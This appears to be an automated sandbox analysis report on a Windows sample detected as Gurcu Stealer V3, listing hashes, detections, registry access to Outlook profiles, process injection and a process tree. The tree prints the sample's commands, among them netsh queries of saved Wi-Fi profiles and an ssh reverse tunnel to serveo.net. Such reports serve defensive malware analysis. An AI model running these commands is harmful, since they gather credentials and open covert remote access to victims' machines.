Analysis
-
max time kernel
126s -
max time network
149s -
platform
windows10-1703_x64 -
resource
win10-20230831-en -
resource tags
arch:x64arch:x86image:win10-20230831-enlocale:en-usos:windows10-1703-x64system -
submitted
23-09-2023 20:50
Static task
static1
Behavioral task
behavioral1
Sample
a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe
Resource
win10-20230831-en
General
-
Target
a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe
-
Size
62KB
-
MD5
5f0bbf0b4ce5fa0bca57f1230e660dff
-
SHA1
529e438c21899eff993c0871ce07aff037d7f10d
-
SHA256
a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d
-
SHA512
ddede174b3aac4bbf434e1d61da8fa858b4bde11850a75b113376dccb7356f054a9fb696f498cb01c040cec33bb03d75c8c7b2787d46fc33569aeb753ee16131
-
SSDEEP
768:I6rewtkBtW3vKSuJS4/bk/4wYMucso7ufooXRsG4TsJOTYp/eKcZbsDzmiKwnq+R:nkjWfKSYS4Yfso8DXt4IroJqYPmkK
Malware Config
Signatures
-
Detect Gurcu Stealer V3 payload 1 IoCs
resource yara_rule behavioral1/memory/3020-7-0x0000000000400000-0x000000000044E000-memory.dmp family_gurcu_v3 -
Executes dropped EXE 1 IoCs
pid Process 1364 ssh.exe -
Loads dropped DLL 1 IoCs
pid Process 1364 ssh.exe -
Accesses Microsoft Outlook profiles 1 TTPs 3 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
flow ioc 9 ip-api.com -
Suspicious use of SetThreadContext 1 IoCs
description pid Process procid_target PID 5064 set thread context of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 -
Suspicious behavior: EnumeratesProcesses 3 IoCs
pid Process 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 3020 aspnet_compiler.exe 3020 aspnet_compiler.exe -
Suspicious use of AdjustPrivilegeToken 2 IoCs
description pid Process Token: SeDebugPrivilege 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe Token: SeDebugPrivilege 3020 aspnet_compiler.exe -
Suspicious use of WriteProcessMemory 35 IoCs
description pid Process procid_target PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 5064 wrote to memory of 3020 5064 a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe 70 PID 3020 wrote to memory of 2036 3020 aspnet_compiler.exe 71 PID 3020 wrote to memory of 2036 3020 aspnet_compiler.exe 71 PID 3020 wrote to memory of 2036 3020 aspnet_compiler.exe 71 PID 2036 wrote to memory of 4432 2036 cmd.exe 73 PID 2036 wrote to memory of 4432 2036 cmd.exe 73 PID 2036 wrote to memory of 4432 2036 cmd.exe 73 PID 2036 wrote to memory of 2868 2036 cmd.exe 74 PID 2036 wrote to memory of 2868 2036 cmd.exe 74 PID 2036 wrote to memory of 2868 2036 cmd.exe 74 PID 2036 wrote to memory of 2492 2036 cmd.exe 75 PID 2036 wrote to memory of 2492 2036 cmd.exe 75 PID 2036 wrote to memory of 2492 2036 cmd.exe 75 PID 3020 wrote to memory of 2488 3020 aspnet_compiler.exe 76 PID 3020 wrote to memory of 2488 3020 aspnet_compiler.exe 76 PID 3020 wrote to memory of 2488 3020 aspnet_compiler.exe 76 PID 2488 wrote to memory of 5080 2488 cmd.exe 78 PID 2488 wrote to memory of 5080 2488 cmd.exe 78 PID 2488 wrote to memory of 5080 2488 cmd.exe 78 PID 2488 wrote to memory of 2548 2488 cmd.exe 79 PID 2488 wrote to memory of 2548 2488 cmd.exe 79 PID 2488 wrote to memory of 2548 2488 cmd.exe 79 PID 2488 wrote to memory of 3304 2488 cmd.exe 80 PID 2488 wrote to memory of 3304 2488 cmd.exe 80 PID 2488 wrote to memory of 3304 2488 cmd.exe 80 PID 3020 wrote to memory of 1364 3020 aspnet_compiler.exe 82 PID 3020 wrote to memory of 1364 3020 aspnet_compiler.exe 82 PID 3020 wrote to memory of 1364 3020 aspnet_compiler.exe 82 -
outlook_office_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Office\16.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe -
outlook_win_path 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-3540700546-2554825161-2349363825-1000\Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676 aspnet_compiler.exe
Processes
-
C:\Users\Admin\AppData\Local\Temp\a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe"C:\Users\Admin\AppData\Local\Temp\a4c58de9ff779e2b5c28d35dde1884891ab419e909e42c5a164ea576d8348e6d.exe"1⤵
- Suspicious use of SetThreadContext
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:5064 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe2⤵
- Accesses Microsoft Outlook profiles
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
- outlook_office_path
- outlook_win_path
PID:3020 -
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show profiles|findstr /R /C:"[ ]:[ ]"3⤵
- Suspicious use of WriteProcessMemory
PID:2036 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:4432
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show profiles4⤵PID:2868
-
-
C:\Windows\SysWOW64\findstr.exefindstr /R /C:"[ ]:[ ]"4⤵PID:2492
-
-
-
C:\Windows\SysWOW64\cmd.exe"cmd.exe" /c chcp 65001 && netsh wlan show networks mode=bssid | findstr "SSID BSSID Signal"3⤵
- Suspicious use of WriteProcessMemory
PID:2488 -
C:\Windows\SysWOW64\chcp.comchcp 650014⤵PID:5080
-
-
C:\Windows\SysWOW64\netsh.exenetsh wlan show networks mode=bssid4⤵PID:2548
-
-
C:\Windows\SysWOW64\findstr.exefindstr "SSID BSSID Signal"4⤵PID:3304
-
-
-
C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe"C:\Users\Admin\AppData\Local\WindowsSecurity\OpenSSH-Win32\ssh.exe" -o "StrictHostKeyChecking=no" -R 80:127.0.0.1:7465 serveo.net3⤵
- Executes dropped EXE
- Loads dropped DLL
PID:1364
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
914KB
MD5d1ce628a81ab779f1e8f7bf7df1bb32c
SHA1011c90c704bb4782001d6e6ce1c647bf2bb17e01
SHA2562afb05a73ddb32ae71ebdc726a9956d844bf8f0deba339928ca8edce6427df71
SHA512de44fff7a679138bae71103190ab450b17590df3c3dde466a54da80d2102a04fc6e12ad65448d9d935e01b577651121184b63133be6cb010aaa32d39786c740f
-
Filesize
1.5MB
MD579a6e2268dfdba1d94c27f4b17265ff4
SHA1b17eed8cb6f454700f8bfcfd315d5627d3cf741c
SHA2566562ae65844bd9bb6d70908bfb67bc03e85053e6e0673457b0341a7ad5a957d5
SHA5123ebe640a6395f6fbcfb28afe6383b8911f2d30847699dcbcbe1a0f5d9e090a9b7f714d5aa4e6a9891e72109edf494efaf0b7b2bb954e2763b1fbba2946c9723c